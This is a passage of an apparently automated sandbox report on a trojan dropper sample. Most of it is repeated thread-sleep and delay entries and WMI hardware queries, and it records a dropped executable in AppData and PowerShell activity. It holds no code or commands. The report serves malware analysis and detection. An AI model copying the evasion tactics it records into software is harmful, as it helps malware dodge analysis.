                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -98046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97934s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97826s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97466s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -97000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -96891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -96782s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -96657s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199657s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199407s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199282s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199157s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1199032s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198565s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1198094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1197969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1197860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe TID: 7616Thread sleep time: -1197735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98968s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98515s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98401s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -98078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97968s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -97093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -96984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -96874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199968s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199749s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1199093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198545s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198327s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1198099s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1197966s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1197859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe TID: 7192Thread sleep time: -1197750s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99864Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99735Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99624Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99505Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99375Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99265Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99157Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 99043Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98930Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98828Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98719Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98609Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98493Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98391Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98151Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 98046Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97934Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97826Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97719Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97594Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97466Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97344Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97219Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97109Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 97000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 96891Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 96782Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 96657Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199875Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199766Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199657Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199532Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199407Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199282Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199157Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1199032Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198922Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198813Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198688Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198565Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198438Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198313Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198203Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1198094Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1197969Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1197860Jump to behavior
